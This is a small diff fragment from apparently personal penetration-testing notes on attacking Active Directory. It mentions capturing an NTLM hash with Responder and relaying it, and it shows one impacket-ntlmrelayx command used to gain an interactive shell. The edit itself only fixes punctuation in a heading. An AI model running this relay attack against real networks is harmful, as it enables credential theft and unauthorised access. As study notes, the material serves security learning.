Ju-On/Offensive-Security/Attacking Active Directory: Initial Attack Vectors.md

 We have succesfully captured the NTLM hash from frankcastle with Responder and also relayed it back to the server using impacket-ntlmrelayx

-6. Gaining interactive shell with impacket
+6. Gaining interactive shell with impacket.

             impacket-ntlmrelayx -tf targets.txt -smb2support -i